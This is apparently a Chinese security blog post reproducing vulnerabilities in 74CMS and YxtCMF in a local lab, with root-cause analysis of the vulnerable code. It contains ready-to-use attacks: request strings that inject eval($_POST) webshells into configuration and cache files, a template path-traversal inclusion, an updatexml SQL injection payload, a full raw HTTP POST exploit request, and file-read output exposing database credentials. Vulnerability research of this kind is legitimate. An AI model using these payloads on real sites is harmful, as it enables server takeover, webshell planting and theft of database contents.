<h3 id="后台getshell第二种"><a href="#后台getshell第二种" class="headerlink" title="后台getshell第二种"></a>后台getshell第二种</h3><ol>
<li><p>环境</p>
<p>74CMS_v5.0.1</p>
</li>
<li><p>利用条件</p>
<p>得到管理员账户密码，登录后台</p>
</li>
<li><p>payload</p>
<figure class="highlight sas"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sas">/<span class="hljs-meta">index</span>.php?m=admin<span class="hljs-variable">&amp;c</span>=tpl<span class="hljs-variable">&amp;a</span>=<span class="hljs-meta">set</span><span class="hljs-variable">&amp;tpl_dir</span>=a<span class="hljs-string">&#x27;.$&#123;eval($_POST[2])&#125;.&#x27;</span><br></code></pre></td></tr></table></figure>

<p>小马地址：/Application/Home/Conf/config.php</p>
<p><img src="F:\DAS\image-20201225141408959.png" srcset="/windL1n/img/loading.gif" lazyload alt="image-20201225141408959"></p>
</li>
<li><p>漏洞成因</p>
<p><strong>tpl-&gt;set()</strong>-&gt;<strong>/Common/BackendController(后台控制器基类)-&gt;update_config()</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">$this</span>-&gt;update_config(<span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;DEFAULT_THEME&#x27;</span>=&gt;<span class="hljs-variable">$tpl_dir</span>));<br></code></pre></td></tr></table></figure>

<p>在update_config()方法里，默认是往/Home/Conf/config.php文件里写配置信息，stripslashes()函数会删去传入参数中的反斜杠，导致可以向配置文件里写入恶意代码。与第一种方法一样，也是调用update_config()函数。</p>
</li>
</ol>
<h3 id="SSTI漏洞"><a href="#SSTI漏洞" class="headerlink" title="SSTI漏洞"></a>SSTI漏洞</h3><ol>
<li><p>环境</p>
<p>Apache2.4.39；php5.6.9; mysql5.7.26</p>
<p>74cms_Home_Setup_v5.0.1（5.0.1版本已经对这个漏洞进行修复）  thinkphp3.2.3框架</p>
</li>
<li><p>影响范围</p>
<p>4.0.0 ~ 4.1.24</p>
</li>
<li><p>漏洞修复</p>
<ul>
<li>新版本里，在/Home/Controller/MController/index，下</li>
</ul>
</li>
</ol>
   <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">index</span>(<span class="hljs-params"></span>)</span>&#123;   <span class="hljs-keyword">if</span>(!I(<span class="hljs-string">&#x27;get.org&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;trim&#x27;</span>) &amp;&amp; C(<span class="hljs-string">&#x27;PLATFORM&#x27;</span>) == <span class="hljs-string">&#x27;mobile&#x27;</span> &amp;&amp; <span class="hljs-keyword">$this</span>-&gt;apply[<span class="hljs-string">&#x27;Mobile&#x27;</span>])&#123;           redirect(build_mobile_url());   &#125;       <span class="hljs-variable">$type</span> = I(<span class="hljs-string">&#x27;get.type&#x27;</span>,<span class="hljs-string">&#x27;android&#x27;</span>,<span class="hljs-string">&#x27;trim&#x27;</span>);    <span class="hljs-comment">// 以下三行代码是加入的补丁       if(!in_array($type, array(&#x27;ios&#x27;,&#x27;android&#x27;,&#x27;touch&#x27;,&#x27;weixin&#x27;)))&#123;           $this-&gt;error(&#x27;参数错误！&#x27;);       &#125;       $this-&gt;assign(&#x27;type&#x27;,$type);       $this-&gt;display(&#x27;M/&#x27;.$type);   &#125;</span><br></code></pre></td></tr></table></figure>

<p>   对传入的type参数进行白名单过滤。在上传文件后，不会返回文件存储的路径和替换后的文件名。</p>
<ol start="4">
<li><p>漏洞利用（删去加入的补丁）</p>
<p>测试是否能够包含文件</p>
<figure class="highlight sas"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sas">/<span class="hljs-meta">index</span>.php?m=<span class="hljs-variable">&amp;c</span>=M<span class="hljs-variable">&amp;a</span>=<span class="hljs-meta">index</span><span class="hljs-variable">&amp;type</span>=../favicon.ico<br></code></pre></td></tr></table></figure>

<p>上传一个内容符合ThinkPHP模板格式的文件，再在type值里输入文件的地址，文件包含成功。</p>
<p><img src="F:\DAS\image-20201227171503620.png" srcset="/windL1n/img/loading.gif" lazyload alt="image-20201227171503620"></p>
<p>回显</p>
<p>{“status”:1,”msg”:”\u4e0a\u4f20\u6210\u529f\uff01”,”data”:{“name”:”Doc1.docx”,”path”:”/index.php?m=&amp;c=download&amp;a=word_resume&amp;id=1”,”time”:”2020-12-27 17:15”},”dialog”:””}</p>
<p>5.0.1的版本下，不会返回上传文件的路径，但是在这个漏洞的影响范围的版本里，会直接返回文件的路径和替换后的文件名。</p>
<p>文件上传的路径是../data/upload/word_resume/2012/27/5fe850b5aa158.docx，</p>
<p>payload:</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-regexp">/index.php?m=&amp;c=M&amp;a=index&amp;type=../</span>data<span class="hljs-regexp">/upload/</span>word_resume<span class="hljs-regexp">/2012/</span><span class="hljs-number">27</span>/<span class="hljs-number">5</span>fe850b5aa158.docx<br></code></pre></td></tr></table></figure>

<p>文件包含成功。</p>
</li>
<li><p>漏洞成因</p>
<p>在/Home/Controller/MController/index，对传入的type参数的值没有进行过滤，直接通过display方法进行调用；</p>
<p>在display()里，调用fetch()获取模板内容，当输入参数只有模板文件名时，会调用parseTemplate()来自动定位模板文件，当文件存在时，就直接返回文件的路径，可以直接进行包含。具体见thinkphp3.2.3 ssti漏洞，两个原理一样。</p>
</li>
</ol>
<hr>
<h3 id="4-版本前台SQL注入（复现失败）"><a href="#4-版本前台SQL注入（复现失败）" class="headerlink" title="4.*版本前台SQL注入（复现失败）"></a>4.*版本前台SQL注入（复现失败）</h3><ol>
<li><p>环境</p>
<p>Apache2.4.39；php5.6.9; mysql5.7.26</p>
<p>74cms_Home_Setup_v4.2.111 (thinkphp3.2.3框架)</p>
<p>与74cmsv5.0.1 前台sql注入原理一样</p>
<p>参考：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/3715">https://xz.aliyun.com/t/3715</a></p>
</li>
</ol>
<hr>
<h3 id="任意文件读取漏洞"><a href="#任意文件读取漏洞" class="headerlink" title="任意文件读取漏洞"></a>任意文件读取漏洞</h3><ol>
<li><p>环境</p>
<p>Apache2.4.39；php5.6.9; mysql8.0.12</p>
<p>74cms_Home_Setup_v4.2.111 (thinkphp3.2.3框架)</p>
</li>
<li><p>漏洞范围：&lt;=74cms v4.2.126</p>
</li>
<li><p>漏洞利用</p>
<p>[74cms_file_read.php]: </p>
<p>运行此脚本，读取数据库配置文件，得到连接数据库信息</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs html">----------- url ------------ http://74cms.4.2.111.com:65521//data/upload/avatar/2012/28/9b25e331cdffab7adf76ece9b5a01533.jpg----------- data ------------ &lt;?php return array ( &#x27;DB_TYPE&#x27;=&gt; &#x27;mysql&#x27;, &#x27;DB_HOST&#x27;=&gt; &#x27;127.0.0.1&#x27;, &#x27;DB_NAME&#x27;=&gt; &#x27;74cms2&#x27;, &#x27;DB_USER&#x27;=&gt; &#x27;74cms2&#x27;, &#x27;DB_PWD&#x27;=&gt; &#x27;123456&#x27;, &#x27;DB_PORT&#x27;=&gt; &#x27;0&#x27;, &#x27;DB_PREFIX&#x27;=&gt; &#x27;qs_&#x27;, &#x27;DB_CHARSET&#x27;=&gt; &#x27;utf8&#x27; );<br></code></pre></td></tr></table></figure></li>
<li><p>漏洞成因</p>
<p>在/Home/Controller/MembersController/_save_avatar()方法里，使用copy($path, $filename);  将某一路径下的文件内容复制到另一个文件里，这两个参数都由外部输入确定，可以控制。其中，图片文件名是当前时间的md5值，所以需要用脚本来实现。</p>
<p>有两个地方调用了_save_avatar()方法，</p>
<ul>
<li>/Home/Controller/MembersController/register()会员注册的临时头像转换处：</li>
</ul>
<p>里面有两个参数，cookie中的members_bind_info[temp_avatar]和members_uc_info[uid]</p>
<ul>
<li>/Home/Controller/MembersController/oauth_reg()第三方登录注册。</li>
</ul>
</li>
</ol>
<hr>
<h3 id="v5-0-1-前台sql注入"><a href="#v5-0-1-前台sql注入" class="headerlink" title="v5.0.1 前台sql注入"></a>v5.0.1 前台sql注入</h3><ol>
<li><p>环境</p>
<p>Apache2.4.39；php5.6.9; mysql8.0.12</p>
<p>74cms_Home_Setup_v5.0.1 (thinkphp3.2.3框架)</p>
</li>
<li><p>漏洞利用</p>
<p>条件：普通用户</p>
<p>payload:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">/index.php?m=&amp;c=AjaxPersonal&amp;a=company_focus&amp;company_id[<span class="hljs-number">0</span>]=<span class="hljs-keyword">match</span>&amp;company_id[<span class="hljs-number">1</span>][<span class="hljs-number">0</span>]=aaaaaaa%<span class="hljs-number">22</span>) <span class="hljs-keyword">and</span> updatexml(<span class="hljs-number">1</span>,concat(<span class="hljs-number">0x7e</span>,(select user())),<span class="hljs-number">0</span>) -- a<br></code></pre></td></tr></table></figure>

<p><img src="F:\DAS\image-20201228165121846.png" srcset="/windL1n/img/loading.gif" lazyload alt="image-20201228165121846"></p>
<p>​    </p>
</li>
<li><p>漏洞成因</p>
<p>在/Application/Home/Controller/AjaxPersonalController中，调用了add_focus()方法，在这个方法里调用了check_focus()方法，这个方法里返回</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>-&gt;where(<span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;company_id&#x27;</span>=&gt;<span class="hljs-variable">$company_id</span>,<span class="hljs-string">&#x27;uid&#x27;</span>=&gt;<span class="hljs-variable">$uid</span>))-&gt;find();<br></code></pre></td></tr></table></figure>

<p>对传入where的参数没有进行过滤。company_focus 方法是参数化函数，$company_id参数是不经过I函数过滤的，所以只要where可以控制，就可以直接控制。</p>
<p>参考:<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/3715">https://xz.aliyun.com/t/3715</a></p>
</li>
</ol>
<h2 id="0x05-易学堂yxtcmf"><a href="#0x05-易学堂yxtcmf" class="headerlink" title="0x05 易学堂yxtcmf"></a>0x05 易学堂yxtcmf</h2><ol>
<li><p>后台地址：?g=admin&amp;m=public&amp;a=login</p>
</li>
<li><p>复现</p>
<ol>
<li><p>数据库Sql_mode配置不对，有两个数据表导入失败。</p>
<p>Sql文件里的edu_posts表导入失败：</p>
<p>在创建表的语句最前面加上</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">SET</span> SQL_MODE <span class="hljs-operator">=</span> &quot;NO_AUTO_VALUE_ON_ZERO&quot;;<span class="hljs-keyword">SET</span> AUTOCOMMIT <span class="hljs-operator">=</span> <span class="hljs-number">0</span>;<span class="hljs-keyword">START</span> TRANSACTION;<span class="hljs-keyword">SET</span> time_zone <span class="hljs-operator">=</span> &quot;+00:00&quot;;<br></code></pre></td></tr></table></figure>

<p>再执行。</p>
<p>参考链接<a target="_blank" rel="noopener" href="https://wordpress.stackexchange.com/questions/263989/1067-invalid-default-value-for-post-date-when-trying-to-reset-ai-after-ba">https://wordpress.stackexchange.com/questions/263989/1067-invalid-default-value-for-post-date-when-trying-to-reset-ai-after-ba</a></p>
</li>
<li><p>edu_comments创建失败，#1067 - Invalid default value for ‘createtime’，同上。</p>
</li>
<li><p>安装过程中，管理员用户创建失败，手动创建。</p>
</li>
</ol>
</li>
<li><p>环境</p>
<p>YxtCMF_v6.1，Apache2.4.39，php7.3.4，mysql5.7.26</p>
</li>
<li><p>漏洞利用&amp;成因</p>
<ol>
<li><p>利用条件：登录后台</p>
<p>在后台网站信息，修改网站配置，</p>
</li>
</ol>
<img src="F:\DAS\image-20201229153711429.png" srcset="/windL1n/img/loading.gif" lazyload alt="image-20201229153711429" style="zoom:50%;" />

<p>​    数据处理过程，/Admin/SettingController/site_post()方法里调用sp_set_dynamic_config()函数来更新系统配置，</p>
<p>​    这里有S(“sp_dynamic_config”,$configs); 将系统配置更新以后调用S函数，写入缓存，对传入的数据没有进行检测过滤，缓存路径是/data/runtime/Temp/文件下，因为是thinkphp3框架，缓存文件名是缓存标识的md5值。</p>
<p>​        payload:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">options[dianboIsOpen]=%<span class="hljs-number">0</span>Deval(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>]);<span class="hljs-comment">//</span><br></code></pre></td></tr></table></figure>

<pre><code>     写入小马，蚁剑连接。
</code></pre>
<ol start="2">
<li><p>全局搜索sp_set_dynamic_config()函数</p>
<p>在/api/OauthController里定义了一个injectionAuthocode()函数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">injectionAuthocode</span>(<span class="hljs-params"></span>)</span>&#123;  <span class="hljs-variable">$postdata</span>=I(<span class="hljs-string">&#x27;post.&#x27;</span>);  <span class="hljs-variable">$configs</span>[<span class="hljs-string">&quot;authoCode&quot;</span>]=<span class="hljs-variable">$postdata</span>[<span class="hljs-string">&#x27;authoCode&#x27;</span>];  sp_set_dynamic_config(<span class="hljs-variable">$configs</span>);&#125;<br></code></pre></td></tr></table></figure>

<p>post payload:</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs html">POST /index.php/api/Oauth/injectionAuthocode HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedCache: no-cacheOrigin: moz-extension://10e8cf44-a604-4e95-9072-97d92e7155a8Content-Length: 35Connection: closeCookie: Phpstorm-f6cf02a6=9a875c43-7949-416b-82cb-494fd70e5ab5; admin_username=admin; PHPSESSID=hiu2gnvo9kbkbkrqn5n8ghjfo0authoCode=%0Deval($_POST[&#x27;cmd&#x27;]);//<br></code></pre></td></tr></table></figure>



<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">authoCode=%<span class="hljs-number">0</span>Deval(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>]);<span class="hljs-comment">//</span><br></code></pre></td></tr></table></figure></li>
</ol>
</li>
</ol>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/windL1n/2021/07/04/hello-world/">
                        <span class="hidden-mobile">Hello World</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <span>© 2021 WindL1n. Power By Typecho . Theme by Fluid</span> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/windL1n/js/events.js" ></script>
<script  src="/windL1n/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/windL1n/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/windL1n/js/local-search.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/windL1n/js/boot.js" ></script>


</body>
</html>
